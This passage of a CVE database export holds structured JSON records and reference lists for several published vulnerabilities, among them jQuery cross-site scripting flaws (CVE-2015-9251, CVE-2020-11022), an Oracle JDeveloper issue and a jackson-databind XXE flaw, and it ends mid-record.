scala-compiler", tags: [ "mailing-list", ], url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update", tags: [ "mailing-list", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, ], source: { advisory: "GHSA-gxr4-xjj5-5px2", discovery: "UNKNOWN", }, title: "Potential XSS vulnerability in jQuery", }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2020-11022", datePublished: "2020-04-29T00:00:00", dateReserved: "2020-03-30T00:00:00", dateUpdated: "2024-08-04T11:21:14.453Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2008-2588
Vulnerability from cvelistv5
Published
2008-10-14 21:00
Modified
2024-08-07 09:05
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html | x_refsource_CONFIRM | |
| http://www.securitytracker.com/id?1021054 | vdb-entry, x_refsource_SECTRACK | |
| http://secunia.com/advisories/32291 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.vupen.com/english/advisories/2008/2825 | vdb-entry, x_refsource_VUPEN | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/45877 | vdb-entry, x_refsource_XF |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T09:05:30.291Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { name: "1021054", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id?1021054", }, { name: "32291", tags: [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred", ], url: "http://secunia.com/advisories/32291", }, { name: "ADV-2008-2825", tags: [ "vdb-entry", "x_refsource_VUPEN", "x_transferred", ], url: "http://www.vupen.com/english/advisories/2008/2825", }, { name: "oracle-jdeveloper-info-disclosure(45877)", tags: [ "vdb-entry", "x_refsource_XF", "x_transferred", ], url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2008-10-14T00:00:00", descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-08-07T12:57:01", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { name: "1021054", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id?1021054", }, { name: "32291", tags: [ "third-party-advisory", "x_refsource_SECUNIA", ], url: "http://secunia.com/advisories/32291", }, { name: "ADV-2008-2825", tags: [ "vdb-entry", "x_refsource_VUPEN", ], url: "http://www.vupen.com/english/advisories/2008/2825", }, { name: "oracle-jdeveloper-info-disclosure(45877)", tags: [ "vdb-entry", "x_refsource_XF", ], url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2008-2588", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { name: "1021054", refsource: "SECTRACK", url: "http://www.securitytracker.com/id?1021054", }, { name: "32291", refsource: "SECUNIA", url: "http://secunia.com/advisories/32291", }, { name: "ADV-2008-2825", refsource: "VUPEN", url: "http://www.vupen.com/english/advisories/2008/2825", }, { name: "oracle-jdeveloper-info-disclosure(45877)", refsource: "XF", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2008-2588", datePublished: "2008-10-14T21:00:00", dateReserved: "2008-06-09T00:00:00", dateUpdated: "2024-08-07T09:05:30.291Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2015-9251
Vulnerability from cvelistv5
Published
2018-01-18 23:00
Modified
2024-08-06 08:43
Severity ?
EPSS score ?
Summary
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-06T08:43:41.697Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "105658", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/105658", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_refsource_FULLDISC", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[flink-user] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-dev] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Re: Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2020:0481", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { name: "RHSA-2020:0729", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { name: "openSUSE-SU-2020:0395", tags: [ "vendor-advisory", "x_refsource_SUSE", "x_transferred", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/issues/2432", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/pull/2588", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.tenable.com/security/tns-2019-08", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-01-18T00:00:00", descriptions: [ { lang: "en", value: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2021-01-08T11:06:16", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "105658", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/105658", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_refsource_FULLDISC", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_refsource_FULLDISC", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[flink-user] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-dev] 20190811 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Re: Apache flink 1.7.2 security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2020:0481", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { name: "RHSA-2020:0729", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { name: "openSUSE-SU-2020:0395", tags: [ "vendor-advisory", "x_refsource_SUSE", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/issues/2432", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { tags: [ "x_refsource_MISC", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/pull/2588", }, { tags: [ "x_refsource_MISC", ], url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { tags: [ "x_refsource_MISC", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { tags: [ "x_refsource_MISC", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.tenable.com/security/tns-2019-08", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_MISC", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2015-9251", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "105658", refsource: "BID", url: "http://www.securityfocus.com/bid/105658", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/18", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", refsource: "FULLDISC", url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", refsource: "FULLDISC", url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", refsource: "FULLDISC", url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[flink-user] 20190811 Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E", }, { name: "[flink-dev] 20190811 Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E", }, { name: "[flink-user] 20190813 Re: Apache flink 1.7.2 security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E", }, { name: "[roller-commits] 20190820 [jira] [Created] (ROL-2150) Fix Js security vulnerabilities detected using retire js", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2020:0481", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { name: "RHSA-2020:0729", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { name: "openSUSE-SU-2020:0395", refsource: "SUSE", url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://github.com/jquery/jquery/issues/2432", refsource: "MISC", url: "https://github.com/jquery/jquery/issues/2432", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", refsource: "MISC", url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { name: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", refsource: "MISC", url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { name: "https://snyk.io/vuln/npm:jquery:20150627", refsource: "MISC", url: "https://snyk.io/vuln/npm:jquery:20150627", }, { name: "https://github.com/jquery/jquery/pull/2588", refsource: "MISC", url: "https://github.com/jquery/jquery/pull/2588", }, { name: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", refsource: "MISC", url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { name: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", refsource: "MISC", url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", refsource: "MISC", url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { name: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", refsource: "MISC", url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.tenable.com/security/tns-2019-08", refsource: "CONFIRM", url: "https://www.tenable.com/security/tns-2019-08", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", refsource: "MISC", url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", refsource: "CONFIRM", url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { name: "https://security.netapp.com/advisory/ntap-20210108-0004/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2015-9251", datePublished: "2018-01-18T23:00:00", dateReserved: "2018-01-18T00:00:00", dateUpdated: "2024-08-06T08:43:41.697Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2018-14720
Vulnerability from cvelistv5
Published
2019-01-02 18:00
Modified
2024-08-05 09:38
Severity ?
EPSS score ?
Summary
FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T09:38:13.593Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: 